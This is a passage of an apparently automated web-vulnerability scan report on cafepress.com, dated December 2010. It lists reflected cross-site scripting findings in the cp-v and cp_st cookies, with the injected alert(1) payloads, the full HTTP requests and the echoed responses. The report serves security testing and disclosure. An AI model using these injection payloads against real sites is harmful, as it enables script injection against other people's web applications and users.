GET /+Eat+Sleep+Game+Light+T-Shirt%2C299007536 HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=b1f9d</script><script>alert(1)</script>c7da687b934 ; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; 
__utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW17 Cteonnt-Length: 93236 Date: Sun, 26 Dec 2010 13:46:55 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:56 GMT; path=/ Set-Cookie: cp_sc=100007; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:56 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 93236 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]... 'cafepress.com'; window.cafepress.originCountryCode = 'US' window.cafepress.tealeaf = {}; window.cafepress.tealeaf.pageLandingType = 'ProductDetails' window.cafepress.tealeaf.searchTerm = 'b1f9d</script><script>alert(1)</script>c7da687b934 ' window.cafepress.tealeaf.salesChannel = 'Marketplace' window.cafepress.tealeaf.trafficMedium = 'OMM' window.cafepress.tealeaf.utmTracking = '' window.cafepress.tealeaf.abTestString = 'EXP_08_00:C...[SNIP]...
1.8. http://www.cafepress.com/+aprons [cp-v cookie]
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/+aprons
Issue detail
The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7f815"-alert(1)-"690539d6541 was submitted in the cp-v cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /+aprons HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA7f815"-alert(1)-"690539d6541 ; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW15 Cteonnt-Length: 60358 Date: Sun, 26 Dec 2010 13:47:18 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:17 GMT; path=/ Set-Cookie: cp_sc=100178; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:17 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 60358 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... 2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T"; s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BA7f815"-alert(1)-"690539d6541 "; s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID if (s.eVar26 == "") { if ("" == "affiliate") { s.eVar26 = "2099"; //2099 = affiliate } el...[SNIP]...
1.9. http://www.cafepress.com/+aprons [cp_st cookie]
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/+aprons
Issue detail
The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 87e97</script><script>alert(1)</script>edc3d2d6805 was submitted in the cp_st cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /+aprons HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=87e97</script><script>alert(1)</script>edc3d2d6805 ; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; 
__utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW13 Cteonnt-Length: 60380 Date: Sun, 26 Dec 2010 13:47:16 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:16 GMT; path=/ Set-Cookie: cp_sc=100178; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:16 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 60380 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... = 'cafepress.com'; window.cafepress.originCountryCode = 'US' window.cafepress.tealeaf = {}; window.cafepress.tealeaf.pageLandingType = 'SearchResults' window.cafepress.tealeaf.searchTerm = '87e97</script><script>alert(1)</script>edc3d2d6805 ' window.cafepress.tealeaf.salesChannel = 'Marketplace' window.cafepress.tealeaf.trafficMedium = 'SEO' window.cafepress.tealeaf.utmTracking = '' window.cafepress.tealeaf.abTestString = 'EXP_08_00:C...[SNIP]...
1.10. http://www.cafepress.com/+baby-blanket [cp-v cookie]
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/+baby-blanket
Issue detail
The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 60566"-alert(1)-"db88db638f9 was submitted in the cp-v cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /+baby-blanket HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA60566"-alert(1)-"db88db638f9 ; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW15 Cteonnt-Length: 58705 Date: Sun, 26 Dec 2010 13:47:15 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:15 GMT; path=/ Set-Cookie: cp_sc=100459; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:15 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 58705 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... 2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T"; s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BA60566"-alert(1)-"db88db638f9 "; s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID if (s.eVar26 == "") { if ("" == "affiliate") { s.eVar26 = "2099"; //2099 = affiliate } el...[SNIP]...
1.11. http://www.cafepress.com/+baby-blanket [cp_st cookie]
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/+baby-blanket
Issue detail
The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b770e</script><script>alert(1)</script>35f226fbd0 was submitted in the cp_st cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /+baby-blanket HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=b770e</script><script>alert(1)</script>35f226fbd0 ; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; 
__utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW16 Cteonnt-Length: 58721 Date: Sun, 26 Dec 2010 13:47:13 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:13 GMT; path=/ Set-Cookie: cp_sc=100459; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:13 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 58721 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... = 'cafepress.com'; window.cafepress.originCountryCode = 'US' window.cafepress.tealeaf = {}; window.cafepress.tealeaf.pageLandingType = 'SearchResults' window.cafepress.tealeaf.searchTerm = 'b770e</script><script>alert(1)</script>35f226fbd0 ' window.cafepress.tealeaf.salesChannel = 'Marketplace' window.cafepress.tealeaf.trafficMedium = 'OMM' window.cafepress.tealeaf.utmTracking = '' window.cafepress.tealeaf.abTestString = 'EXP_08_00:C...[SNIP]...
1.12. http://www.cafepress.com/+baby-bodysuits [cp-v cookie]
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/+baby-bodysuits
Issue detail
The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dd70c"-alert(1)-"1bb61056447 was submitted in the cp-v cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /+baby-bodysuits HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; 